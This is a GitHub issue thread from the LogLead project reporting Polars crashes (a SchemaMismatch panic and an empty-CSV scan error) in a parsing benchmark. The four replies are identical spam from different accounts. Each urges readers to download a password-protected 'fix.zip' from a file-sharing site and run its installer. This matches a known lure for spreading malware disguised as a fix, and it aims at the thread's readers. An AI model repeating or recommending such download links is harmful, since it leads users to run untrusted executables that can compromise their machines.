### ISSUE TITLE
Update to latest Polars version 1.5 

### ISSUE THREAD

**Issue by mmantyla** [EvoTestOps/LogLead#36]
In past there have been issues. 
              Parsing speed run  works only up to Polars = 0.20.21
`LogLead/demo/parser_benchmark$ python parsing_speed.py`

Starting from 0.20.22 up until the most recent 0.20.31 there is a crash while loading Nezha-shop. Based on the crash report this is most likely bug in Polars. So for now lets force the Polars version to 0.20.21. Once we get this pip packing done we can  open bug report in Polars. 

Starting 0.20.22 it look lile this: 
```
Processing dataset: Nezha-Shop
Loader: <class 'loglead.loaders.nezha.NezhaLoader'>, args:{'filename': '/home/mmantyla/Datasets/nezha/', 'system': 'WebShop'}
thread '<unnamed>' panicked at crates/polars-core/src/frame/mod.rs:957:36:
should not fail: SchemaMismatch(ErrString("type String is incompatible with expected type Int64"))
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Traceback (most recent call last):
```

Edit: Also Profilence data did not load with 0.20.22 but it gave a different error: 
```
polars.exceptions.NoDataError: 'csv scan' failed
The reason: empty CSV:
```

_Originally posted by @mmantyla in https://github.com/EvoTestOps/LogLead/issues/29#issuecomment-2143843903_

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
